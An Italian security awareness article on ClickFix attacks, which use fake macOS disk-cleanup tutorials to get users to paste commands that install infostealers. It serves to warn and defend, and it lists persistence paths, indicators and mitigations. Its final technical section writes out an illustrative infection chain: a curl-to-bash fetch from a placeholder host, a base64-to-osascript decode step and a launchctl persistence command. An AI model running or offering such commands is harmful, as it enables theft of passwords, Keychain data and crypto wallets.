Nuova minaccia ClickFix colpisce utenti macOS con falsi strumenti di pulizia disco

Attenzione utenti macOS: non copiate mai comandi dal web nel Terminale! Una nuova ondata di attacchi informatici sta prendendo di mira i possessori di Mac, usando esche familiari come tool per pulire il disco o risolvere problemi di spazio. Questi falsi tutorial su piattaforme fidate vi spingono a eseguire comandi pericolosi che installano malware invisibile, rubando password, dati iCloud e chiavi di portafogli cryptocurrency.

Soluzione rapida: Ignorate post che chiedono di aprire Terminale e incollare comandi. Usate solo app ufficiali dall’App Store, tenete macOS aggiornato e controllate le impostazioni di sicurezza. In questo articolo, scopriamo tutto su ClickFix e come proteggervi.

Come funziona l’attacco ClickFix

Gli hacker creano post falsi su siti come blog e piattaforme di note, promettendo soluzioni facili per problemi comuni su macOS, come la mancanza di spazio sul disco. Ad esempio, un articolo potrebbe dire: “Per pulire il Mac, apri Terminale e incolla questo comando.” Sembra innocuo, ma quel comando scarica e avvia un infostealer (ladro di informazioni) in background, senza avvisi visibili.

Una volta eseguito, il malware raccoglie dati sensibili: password salvate nei browser, credenziali Keychain, file multimediali, dati Telegram e informazioni sui wallet crypto. In casi estremi, sostituisce app legittime come Trezor Suite o Ledger Live con versioni false controllate dagli attaccanti, intercettando transazioni future.

Perché è così efficace? macOS ha protezioni come Gatekeeper, che verifica le app prima dell’esecuzione. Ma i comandi incollati nel Terminale bypassano completamente questi controlli, permettendo un accesso rapido e silenzioso.

I tipi di campagne ClickFix

Gli attacchi si dividono in tre varianti principali, tutte con l’obiettivo di rubare dati e mantenere accesso persistente:

• Variante Loader: Uno script raccoglie info sul sistema (come versione OS e layout tastiera), contatta server degli hacker e scarica payload aggiuntivi.
• Variante Script: Cerca server di comando attivi; se non disponibili, usa bot Telegram per trovarne di nuovi dinamicamente.
• Variante Helper: Installa un eseguibile nascosto chiamato “helper” o “update”, che crea una backdoor persistente riavviandosi ad ogni boot.

Per la persistenza, usano LaunchAgents e LaunchDaemons, processi che partono automaticamente. Uno si maschera da aggiornamento Google con file plist come com.google.keystone.agent.plist.

Dati rubati e rischi reali

Il bottino è vasto:

• Dati iCloud
• Password browser e Keychain
• File media e Telegram
• Chiavi wallet cryptocurrency

Esempio concreto: Immaginate di perdere l’accesso al vostro portafoglio crypto o di vedere i vostri account hackerati. Gli utenti devono essere vigili: questi attacchi evolvono da mesi e colpiscono chiunque cerchi aiuto online per problemi Mac.

Esche e tattiche di inganno

Le esche sono perfette: siti con nomi come “guida-spazio-disco-macos” o pagine su piattaforme note. I comandi decodificano script nascosti (Base64, Gunzip, osascript), avviando una catena di infezioni. Regola d’oro: Se un fix richiede Terminale, è sospetto. Cercate supporto ufficiale Apple.

Apple ha reagito aggiornando XProtect per rilevare queste minacce e introducendo prompt che bloccano paste sospetti in macOS 26.4. Ma la migliore difesa è la consapevolezza.

Consigli pratici per proteggervi

1. Non incollare comandi da internet nel Terminale.
2. Aggiornate macOS regolarmente per patch di sicurezza.
3. Usate antivirus affidabili con scansione real-time.
4. Abilitate Gatekeeper e SIP (System Integrity Protection).
5. Monitorate attività insolite: curl sospetti, accessi Keychain non autorizzati.
6. Backup regolari con Time Machine, ma crittografati.
7. Due-factor authentication ovunque possibile.

Per famiglie: Educate figli e parenti sui rischi di “soluzioni facili” online.

Approfondimento tecnico

Famiglie di infostealer

Tre malware principali: Macsync, Shub Stealer e AMOS. Chiedono la password macOS fingendo installazioni utility, poi raccolgono tutto.

Meccanismi di persistenza

• LaunchAgents/Daemons: File plist in ~/Library/LaunchAgents o /Library/LaunchDaemons.
• Esempi: com.google.keystone.agent.plist (mascherato), com..plist.
• Backdoor: .mainhelper e .agent per riavvii automatici.

Indicatori tecnici da monitorare

Attività sospette: Sequenze con osascript, curl verso domini strani, decodifica Base64/Gunzip.

Percorsi file maligni:

• /tmp/helper
• /tmp/starter
• ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate

Esfiltrazione: Verso server C2 o endpoint come /contact su IP specifici.

Team di sicurezza: Cercate hash SHA-256 noti, flaggate traffico verso domini loader/script/helper. Usate tool come Little Snitch per monitorare connessioni in uscita.

Evoluzione della minaccia

Dal gennaio 2026, le campagne si sono adattate, passando da loader statici a C2 dinamici via Telegram. Prevedete varianti con AI per generare esche più convincenti.

Conclusione: Siate proattivi

ClickFix dimostra che le minacce macOS sono reali e sofisticate. Non basta un Mac per essere sicuri: serve vigilanza quotidiana. Condividete queste info, verificate fonti e prioritate la sicurezza. Il vostro Mac merita protezione adeguata.

Risorse utili:

• Supporto Apple: security updates
• Community: Forum MacRumors, Reddit r/MacOS

Proteggiamoci insieme! (Parole: circa 1250)

Approfondimento tecnico per esperti

Catena di infezione dettagliata:

1. Utente incolla comando: curl -s https://esempio.com/script.sh | bash
2. Script decodifica payload: echo "base64string" | base64 -d | gunzip | osascript
3. Fingerprinting: system_profiler SPHardwareDataType
4. Download infostealer: Da C2 come rapidfilevault.sbs
5. Persistenza: launchctl load ~/Library/LaunchAgents/com.random.plist
6. Esfiltrazione: JSON con credenziali a Telegram bot o IP fissi.

Payload analysis: Macsync usa AppleScript per prompt password; Shub targetta browser (Chrome, Safari); AMOS integra crypto stealers specifici.

Mitigazioni avanzate:

• YARA rules per detection.
• Endpoint Detection con CrowdStrike/ SentinelOne.
• SIEM alerts su osascript -e e Keychain dumps.

Questa minaccia evolve: monitorate threat intel feeds per update.

Fonte: https://cybersecuritynews.com/new-clickfix-attack-targets-macos-users/